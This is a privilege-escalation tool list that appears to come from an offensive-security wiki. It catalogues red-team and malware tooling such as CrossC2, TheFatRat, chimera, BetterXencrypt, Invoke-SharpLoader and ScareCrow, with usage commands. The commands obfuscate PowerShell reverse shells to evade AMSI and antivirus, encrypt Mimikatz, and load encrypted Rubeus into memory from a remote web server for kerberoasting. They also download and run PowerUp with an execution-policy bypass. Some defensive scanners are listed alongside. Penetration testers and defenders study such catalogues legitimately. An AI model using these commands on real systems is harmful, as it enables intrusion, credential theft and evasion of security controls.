Privilege Escalation

CrossC2: generate CobaltStrike's cross-platform payload.

/genCrossC2.Linux 4444 .cobaltstrike.beacon_keys null Linux x86 ./cross

TheFatRat: TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

traitor: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins.


DKMC: Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final shellcode payload.

darkarmour: Store and execute an encrypted windows binary from inside memory, without a single bit touching disk.

./ -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5

donut: Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.

chimera: Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

./ -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e

# "cmd.exe" isn't a data type but when wrapped in double-quotes, this works
./ -f shells/generic1.ps1 -l 2 -o /tmp/chimera.ps1 -v -t cmd.exe -c /tmp/harry_potter.txt -i -h -s getstream -b new-object -j -g -k -r -p

./ -f shells/generic2.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s excePTIon.InneRexcePTIon.message,getstream -b invoke-expression,new-object -j -g -k -r -p

./ -f shells/generic3.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s equals,split,getstream -b new-object -j -g -k -r -p

# short strings like `-s pwd` are prone to breaking scrips
./ -f shells/powershell_reverse_shell.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,close,pwd,ascii,write -b iex,out-string,new-object -j -g -k -r -p

# nishang scripts
./ -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r -p
./ -f shells/Invoke-PowerShellTcpOneLine.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,read -b while,new-object,iex -j -g -k -r -p

Invoke-Stealth: This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques.

BetterXencrypt: A better version of Xencrypt.Xencrypt it self is a Powershell runtime crypter designed to evade AVs.

Encrypt C# file:
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

Only full paths to the file are accepted at this point. The encrypted files generated by Invoke-SharpEncrypt can then be hosted on a web server on the Internet or stored on the target system on disk. Invoke-SharpLoader can be used to decrypt and execute the files in memory. Two examples demonstrate how to load a file from a remote webserver or from disk.

Load from URL:
Invoke-SharpLoader -location -password S3cur3Th1sSh1t -noArgs

Load from DISK:
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"
Import-Module ./betterxencrypt.ps1
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

Invoke-SharpLoader: Load encrypted and compressed C# Code from a remote Webserver or from a local file straight to memory and execute it there.

PEASS: Privilege Escalation Awesome Scripts SUITE.

deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE).

unicorn: Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

python harmless.ps1
python myfile.ps1 macro
python muahahaha.ps1 macro 500

InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation tools.

Below is the difference in Seatbelt between unobfuscated and then obfuscated version with InvisibilityCloak against Microsoft Defender using Defender Check.

ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.

PowerSploit: PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

powershell Invoke-WebRequest -OutFile PowerUp.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

Powerless: Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind.

Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities.

C:\> Watson.exe
  __    __      _
 / / /\ \ \__ _| |_ ___  ___  _ __
 \ \/  \/ / _` | __/ __|/ _ \| '_ \
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|



 [*] OS Build Number: 14393
 [*] Enumerating installed KBs...

 [!] CVE-2019-0836 : VULNERABLE

 [!] CVE-2019-0841 : VULNERABLE

 [!] CVE-2019-1064 : VULNERABLE

 [!] CVE-2019-1130 : VULNERABLE

Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

JAWS: JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.

AccessChk: Find misconfigured services.

accesschk.exe /accepteula
accesschk "power users" c:\windows\system32
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

MineSweeper: Windows user-land hooks manipulation tool.

pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).

hollows_hunter: Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

SharpImpersonation: A User Impersonation tool - via Token or Shellcode injection.

PINKPHANTER: Windows x64 handcrafted token stealing kernel-mode shellcode

Koh: The Token Stealer.

Linux GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

LinEnum: Linux sh script for privesc.

/ -s -k keyword -r report -e /tmp/ -t

pspy: unprivileged Linux process snooping.

Last updated